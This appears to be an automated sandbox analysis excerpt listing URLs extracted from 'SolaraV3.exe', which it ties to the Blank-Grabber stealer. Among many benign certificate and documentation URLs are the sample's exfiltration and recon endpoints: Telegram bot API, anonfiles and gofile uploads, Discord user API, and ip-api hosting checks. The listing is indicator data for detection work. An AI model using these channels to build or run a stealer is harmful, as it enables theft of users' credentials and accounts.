              Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
              Source: SolaraV3.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: SolaraV3.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: SolaraV3.exe, 00000002.00000002.2038113836.000001FC24F05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: qmgr.db.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: qmgr.db.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: qmgr.db.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: qmgr.db.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: qmgr.db.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: qmgr.db.26.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: svchost.exe, 0000001A.00000003.1634045934.000001407C750000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC253DF000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC253E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545r
              Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingr
              Source: SolaraV3.exe, 00000002.00000003.1684359906.000001FC2531E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://logo.ve
              Source: SolaraV3.exe, 00000002.00000003.1684359906.000001FC2531E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://logo.veANIFE~1JSO
              Source: SolaraV3.exe, 00000002.00000003.1695774309.000001FC2531F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1704396289.000001FC25320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://logo.veW
              Source: SolaraV3.exe, 00000002.00000003.1695774309.000001FC2531F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1704396289.000001FC25320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://logo.veWALLET~2.JS
              Source: powershell.exe, 0000000E.00000002.1785679390.00000267B9182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1847941368.00000239E80DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1901085383.00000239F6919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1901085383.00000239F67D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: SolaraV3.exe, rar.exe.1.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.drString found in binary or memory: http://ocsp.digicert.com0
              Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
              Source: SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr, _hashlib.pyd.1.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0shtable_get
              Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0shtable_get_Py_hashtable_hash_ptr_Py_hashtable_new_Py_hashtable_new_full_Py
              Source: SolaraV3.exe, rar.exe.1.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: SolaraV3.exeString found in binary or memory: http://ocsp.sectigo.com0$
              Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr, libffi-7.dll.1.drString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 0000004A.00000002.1847941368.00000239E8080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: SolaraV3.exe, rar.exe.1.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: SolaraV3.exe, rar.exe.1.drString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 0000000E.00000002.1728980230.00000267A9338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 0000000E.00000002.1728980230.00000267A9111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1847941368.00000239E6761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000E.00000002.1728980230.00000267A9338000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: SolaraV3.exe, 00000002.00000002.2043475691.000001FC25870000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: SolaraV3.exe, rar.exe.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr, libffi-7.dll.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: SolaraV3.exe, rar.exe.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr, libffi-7.dll.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr, libffi-7.dll.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: SolaraV3.exe, rar.exe.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 0000004A.00000002.1847941368.00000239E7EDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 0000004A.00000002.1847941368.00000239E8080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: SolaraV3.exe, 00000002.00000003.1769191684.000001FC2540D000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2040009745.000001FC2540D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25C1C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 0000000E.00000002.1728980230.00000267A9111000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1847941368.00000239E6761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BE8000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/uploadrU
              Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
              Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/%s
              Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot%s/%s)
              Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 0000004A.00000002.1901085383.00000239F67D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000004A.00000002.1901085383.00000239F67D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000004A.00000002.1901085383.00000239F67D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: SolaraV3.exe, rar.exe.1.drString found in binary or memory: https://d.symcb.com/cps0%
              Source: SolaraV3.exe, rar.exe.1.drString found in binary or memory: https://d.symcb.com/rpa0
              Source: SolaraV3.exe, rar.exe.1.drString found in binary or memory: https://d.symcb.com/rpa0.
              Source: SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24A30000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24ABC000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24A30000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24ABC000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24ABC000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24ABC000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
              Source: SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24A30000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037735840.000001FC24ABC000.00000004.00001000.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
              Source: SolaraV3.exe, 00000002.00000003.1569760927.000001FC22D75000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1569835385.000001FC22D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
              Source: SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: SolaraV3.exe, 00000002.00000003.1920372712.000001FC2534A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: SolaraV3.exe, 00000002.00000002.2043341450.000001FC25770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: qmgr.db.26.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
              Source: svchost.exe, 0000001A.00000003.1634045934.000001407C750000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.26.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
              Source: SolaraV3.exe, 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
              Source: SolaraV3.exe, 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-GrabberrU
              Source: SolaraV3.exe, 00000002.00000003.1576344142.000001FC253B0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1576939508.000001FC253B0000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1576455903.000001FC2577A000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1576808435.000001FC253B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
